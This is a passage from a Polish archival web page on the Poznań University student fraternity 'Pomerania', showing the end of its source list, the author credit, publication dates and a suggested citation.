2) Pomerania Korporacja Studentów Uniwersytetu Poznańskiego 1923-1933, Poznań 1933,
3) materiałów archiwalnych z Archiwum Korporacyjnego,
4) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Pomerania.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 9 X 2010 r.
Ostatnia zmiana: 18 III 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego “Pomerania”, (na:) www.archiwumkorporacyjne.pl, stan 18 III 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }